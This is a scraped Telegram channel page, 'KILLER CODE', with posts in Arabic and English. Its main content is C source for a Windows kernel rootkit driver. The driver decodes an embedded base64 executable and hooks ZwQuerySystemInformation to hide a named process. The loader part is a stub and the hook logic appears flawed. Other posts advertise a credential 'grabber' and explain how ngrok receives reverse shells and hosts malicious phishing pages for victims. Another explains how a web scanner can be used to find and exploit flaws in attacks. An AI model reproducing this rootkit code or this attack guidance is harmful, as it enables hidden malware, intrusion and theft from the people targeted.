en
Feedback
KILLER CODE

KILLER CODE

Open in Telegram

#include int main(){Fs();/*uid=0*/}

Show more
No data
Subscribers
-224 hours
-187 days
+25330 days
Posts Archive
#include #include // Define the function prototype for ZwQuerySystemInformation typedef NTSTATUS (NTAPI *ZwQuerySystemInforma
#include <ntddk.h>
#include <ntstrsafe.h>
// Define the function prototype for ZwQuerySystemInformation
typedef NTSTATUS (NTAPI *ZwQuerySystemInformation_t)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);
// Original system function to query system information
ZwQuerySystemInformation_t OriginalZwQuerySystemInformation = NULL;
// Base64 string of the executable (you would replace this with your actual base64 string)
const char* base64ExeString = "YOUR_BASE64_STRING_HERE"; 
// Function to decode Base64 string
NTSTATUS Base64Decode(const char* base64, PVOID* outBuffer, PULONG outSize) {
    ULONG length = 0;
    UCHAR* decodedData = NULL;
    NTSTATUS status = RtlDecodeBase64String(base64, &length, NULL);
    if (NT_SUCCESS(status)) {
        decodedData = (UCHAR*)ExAllocatePool(NonPagedPool, length);
        if (decodedData) {
            status = RtlDecodeBase64String(base64, &length, decodedData);
            if (NT_SUCCESS(status)) {
                *outBuffer = decodedData;
                *outSize = length;
            } else {
                ExFreePool(decodedData);
            }
        } else {
            status = STATUS_INSUFFICIENT_RESOURCES;
        }
    }
    return status;
}
// Function to load the decoded executable into memory
NTSTATUS LoadExeFromMemory(PVOID buffer, ULONG size) {
    // In a real-world scenario, you would use functions like
    // ZwCreateSection, ZwMapViewOfSection, and ZwCreateProcess
    // to execute the code directly from memory. This part is left
    // abstract as it involves complex kernel-mode operations.
    DbgPrint("Loaded executable into memory with size: %d\n", size);
    return STATUS_SUCCESS;
}
// Hooked ZwQuerySystemInformation to hide the process
NTSTATUS NTAPI HookedZwQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
) {
    NTSTATUS status = OriginalZwQuerySystemInformation(
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength
    );
    if (status == STATUS_SUCCESS) {
        SYSTEM_PROCESS_INFORMATION* info = (SYSTEM_PROCESS_INFORMATION*)SystemInformation;
        // Iterate through processes and hide the target process (e.g., "hidden_process.exe")
        while (info->NextEntryOffset) {
            if (wcscmp(info->ImageName.Buffer, L"hidden_process.exe") == 0) {
                // Skip this process, effectively hiding it
                info->NextEntryOffset = 0;
            }
            info = (SYSTEM_PROCESS_INFORMATION*)((PUCHAR)info + info->NextEntryOffset);
        }
    }
    return status;
}
// Driver unload function
void DriverUnload(PDRIVER_OBJECT pDriverObject) {
    // Restore the original system call
    if (OriginalZwQuerySystemInformation) {
        InterlockedExchangePointer(
            (PVOID*)&ZwQuerySystemInformation, 
            (PVOID)OriginalZwQuerySystemInformation
        );
    }
    DbgPrint("Driver unloaded\n");
}
// Driver entry function
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) {
    PVOID exeBuffer = NULL;
    ULONG exeSize = 0;
    NTSTATUS status = Base64Decode(base64ExeString, &exeBuffer, &exeSize);
    if (NT_SUCCESS(status)) {
        DbgPrint("Base64 decoded successfully. Size: %d bytes\n", exeSize);
         // Load and execute the decoded executable in memory
        status = LoadExeFromMemory(exeBuffer, exeSize);
        
        if (!NT_SUCCESS(status)) {
            DbgPrint("Failed to load executable from memory.\n");
        }
    } else {
        DbgPrint("Base64 decoding failed. Status: 0x%x\n", status);
    }

    // Hook the system call for process listing (ZwQuerySystemInformation)
    OriginalZwQuerySystemInformation = (ZwQuerySystemInformation_t)ZwQuerySystemInformation;
    ZwQuerySystemInformation = HookedZwQuerySystemInformation;

    pDriverObject->DriverUnload = DriverUnload;

    DbgPrint("Driver loaded\n");

    return STATUS_SUCCESS;
}

MY OWN GRABBER 💀☢️
MY OWN GRABBER 💀☢️

عندك مشروع برمجي⭐️مهتم اطوره ليك تواصل معايا خاص @EIPDZG ⭐️⭐️

Ngrok الأداة دي بتسمحلك تفتح بورت ثابت على شبكة الإنترنت حتى لو انت شغال من ورا راوتر أو في شبكة محلية (LAN) وبتعمل الكلام دا عن طريق إنها بتعمل نفق مشفر من جهازك الشخصي لسيرفراتهم على الإنترنت ومن خلال النفق دا بيدوك IP وبورت خارجي تقدر تبعت عليه التبليغ أو تستقبل عليه اتصال عكسي (reverse shell) النسخة المجانية من ngrok بتديك IP وبورت بيتغيروا كل مرة تقفل فيها التيرمنال اللي شغلت منها الأداة يعني لو شغلت بايلود والهدف اتصل بيك لازم التيرمنال تفضل مفتوحة طول ما انت مستني الاتصال لان بمجرد ما تقفل التيرمنال ال IP والبورت هيتغيروا ولو حاولت تستقبل اتصال تاني مش هيجي لأن ال IP والبورت اللي انت شغلت عليهم ngrok في المرة الأولى اتغيروا ومبقوش شغالين النسخة المدفوعة من ngrok بقى بتحللك المشكلة دي إنها بتديك IP وبورت ثابتين مش بيتغيروا حتى لو قفلت التيرمنال ودي ميزة كبيرة جدا خصوصا لو بتستخدم ngrok كجزء من حملة طويلة أو لو بتتعامل مع أهداف بتاخد وقت عشان تتصل بيك من الفوائد المهمة لأداة ngrok برضه إنها بتفتحلك البورت بشكل مباشر على الإنترنت وده بيساعدك في حاجتين أول حاجة إنه بيسهل عملية الريفيرس شيل لأنك ببساطة بتديله IP وبورت من ngrok والهدف بيبعتلك الاتصال العكسي عليه ثاني حاجة بتبقى مفيدة في إنك تقدر تشغل سيرفر محلي على جهازك وتفتحه للإنترنت بشكل مباشر مثلا لو شغال على تطوير ويب وعايز تختبر سيرفر محلي من موبايل أو جهاز خارج شبكتك الأداة دي مفيدة جدا للهكرز اللي محتاجين يبعتوا تبليغ لجهازهم حتى لو هما مش على نفس الشبكة مع الهدف بفضل ngrok هتقدر تخترق أهدافك حتى لو هما برا الشبكة المحلية بتاعتك وكمان لو بتستخدم social engineering وعايز تستضيف صفحات خبيثة على سيرفر محلي وتبعته للضحايا ngrok بيسهللك العملية دي لأنه بيخلي السيرفر المحلي بتاعك مفتوح للضحايا على الإنترنت في الآخر ngrok هي أداة مهمة جدا للهكرز والباحثين الأمنيين اللي محتاجين يتعاملوا مع أهداف عن بعد ويستغلوا الثغرات بشكل عملي سواء عن طريق الريفيرس شيل أو عن طريق تبليغ مباشر رابط الأداة

أداة HCL AppScan Standard اللي هي واحدة من أقوى الأدوات اللي بيستخدمها الهكرز المحترفين ومحللي الأمان في اكتشاف الثغرات الأمنية في التطبيقات الويب والأداة دي بتشتغل على تحليل التطبيقات بشكل ديناميكي وساكن وتقدر من خلالها تكتشف الثغرات زي SQL Injection وXSS وCSRF وغيرها بشكل سريع وفعال وفكرة عمل الأداة مبنية على إنها بتمسح الكود والمحتوى بتاع التطبيق وبتحاكي التفاعلات اللي ممكن المستخدم يعملها مع التطبيق وده بيساعد في اكتشاف الثغرات اللي ممكن تتسبب في اختراق النظام وتعرض البيانات للخطر كمان الأداة بتستخدم تقنيات الذكاء الصناعي والتعلم الآلي عشان تحسن من عملية اكتشاف الثغرات وتقلل من نسبة النتائج الكاذبة اللي ممكن تظهر ومن الحاجات المهمة في الأداة إنها بتدعم التكامل مع بيئات التطوير المختلفة زي Jenkins وMaven وEclipse وده بيسهل على المطورين إنهم يدمجوا الأداة في دورة حياة التطوير بشكل تلقائي ويكتشفوا الثغرات أول بأول طيب دلوقتي إزاي الهكرز ممكن يستفيدوا من الأداة دي في اختراق الأنظمة وإزاي ممكن يستخدموها بشكل غير مشروع أول حاجة الهكرز ممكن يستخدموا الأداة في إجراء تحليل شامل للتطبيقات الويب اللي عايزين يخترقوها وده هيديهم فكرة واضحة عن كل الثغرات الموجودة في التطبيق وبالتالي يقدروا يحددوا الثغرات اللي ممكن يستغلوها بأقل مجهود وبأسرع وقت وتاني حاجة الأداة بتوفر تقارير مفصلة جدًا عن كل ثغرة بتكتشفها التقارير دي بتحتوي على معلومات عن مكان الثغرة وأزاي ممكن تستغلها وده بيسهل على الهكرز إنهم يخططوا للهجوم بشكل دقيق وبدون أي تخبط ومن المميزات اللي بتميز الأداة إنها بتدعم الفحص اليدوي وده يعني إن الهكر يقدر يتدخل بنفسه ويعدل في إعدادات الفحص أو يركز على أجزاء معينة من التطبيق اللي هو عايز يستهدفها بشكل خاص وده بيدي الهكرز مرونة كبيرة في تحليل التطبيقات واستهداف الثغرات اللي ممكن تكون مش واضحة بشكل مباشر للأنظمة التلقائية زي HCL AppScan Standard دي أداة قوية جدًا سواء كنت هكر أو محلل أمان الأداة دي هتديك القوة والتحليل العميق اللي محتاجه عشان تكتشف الثغرات وتستغلها بشكل فعال وفي النهاية لازم تفهم إن الأداة دي زي ما هي مفيدة لحماية الأنظمة هي كمان خطيرة جدًا لو وقعت في إيد الشخص الغلط لأنه ممكن يستخدمها لإلحاق ضرر كبير بأي تطبيق ويب مش مؤمن كويس وده يوضح قد إيه أهمية إنك تبقى عارف إزاي تستخدم الأدوات دي بشكل صحيح سواء كنت هتستخدمها للدفاع عن الأنظمة أو للهجوم عليها رابط الأداة

work hard 🔥😈
work hard 🔥😈

شغل من نار 💀😍
شغل من نار 💀😍

جهازي شغال عليه ✅✅
جهازي شغال عليه ✅✅

نقلته لكم للأفادة

Voice message02:25

تفضل

ركز معايا

كيف يعني الديفلوبرز؟

الـDevelopers

طيب الحين في الشركات الكبيرة لما الفريق الدفاعي يعمل فحص للشبكة وبيكتشف ثغرات في النظام فمن المسؤول عن تصحيح النظام ؟

كلكم تقدرو ⚔️⭐

mk48xRzuNvA.m4a2.71 MB

حبيت إشارك معاكم اجابتي من باب الإفادة

من عند الاخوة الكرام Egyptian shield https://t.me/Egyshield 🪟⭐️
+1
من عند الاخوة الكرام Egyptian shield https://t.me/Egyshield 🪟⭐️

مصدر اجابتي من فين؟